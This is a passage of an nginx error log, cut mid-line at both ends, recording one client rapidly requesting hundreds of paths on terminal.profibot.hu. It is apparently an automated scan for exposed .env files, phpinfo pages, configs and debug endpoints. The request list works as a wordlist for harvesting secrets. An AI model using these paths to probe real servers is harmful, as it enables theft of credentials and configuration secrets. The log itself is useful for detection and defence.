failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /strapi/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /style/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /styles/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /stylesheets/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /swagger/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /symfony/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /system-config/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /system/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /system/config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /system/phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /target/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /temanr10/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /temanr9/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /temp.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /temp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /template/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /templates/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test-api/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test-network/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test-network/addOrg3/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/aries-js-worker/fixtures/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/adapter-rest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/agent-rest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/couchdb/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:06 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/demo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/demo/openapi/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/did-method-rest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/did-rest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/edv-rest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/openapi-demo/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/sidetree-mock/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/universalresolver/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/bdd/fixtures/vc-rest/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/fixtures/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/fixtures/app_types/node/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/fixtures/app_types/rails/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/fixtures/node_path/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test/integration/env-config/app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test0.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test1 HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test1.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test123.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test2.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test3.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test4.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test5.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test6.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test7.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test8.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test9.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test_info.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test_info1.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test_info2.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test_info3.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test_info4.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test_info5.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test_phpinfo.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test_phpinfo1.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test_phpinfo2.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test_phpinfo3.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test_phpinfo4.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /test_phpinfo5.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:07 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tester.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /testfiles/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /testing.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /testing/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /testing/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /testing/docker/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tests/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Tests/Application/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tests/default_settings/v10.0/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tests/default_settings/v11.0/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tests/default_settings/v12.0/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tests/default_settings/v13.0/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tests/default_settings/v7.0/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tests/default_settings/v8.0/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tests/default_settings/v9.0/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tests/drupal-test/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tests/Integration/Environment/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tests/todo-react/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /testwork_json/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /theme/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /theme_static/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /thumb/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /thumbs/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tiedostot/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /time.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tmp/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tmp/config/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tmp/logs HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /token.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tool/view/phpinfo.view.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tools/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Travel_form/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ts/prime/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /tz.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /u.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ubuntu/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /ui/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /unixtime/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:08 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /unsplash-downloader/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /up.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /upfiles/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /upload/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /uploads/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /urlmem-app/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /user/.env.staging HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /user/login HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /User_info/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /v1/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /v1/admin/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /v1/debug/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /v1/private/ HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /v2/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /var/backup/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vendor/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vendor/github.com/gobuffalo/envy/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vendor/github.com/subosito/gotenv/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vendors~main.f286c0f60bdc707d91a8.bundle.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vercel.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /videos/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vite.config.ts HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vm-docker-compose/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vod_installer/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vue-end/vue-til/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vue/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vue/vuecli/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /vue_CRM/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /w.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /web-dist/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /web.config HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /web.php HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /web/debug/default/view HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /Web/siteMariage/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /webpack-stats.json HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /webpack.config.js HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /webroot_path/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /website/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:09 [error] 309#309: *29553 web-terminal could not be resolved (2: Server failure), client: 185.177.72.56, server: terminal.profibot.hu, request: "GET /websocket/.env HTTP/1.1", host: "terminal.profibot.hu" +2026/01/28 14:24:10 [error] 309#309: *29553 web-terminal 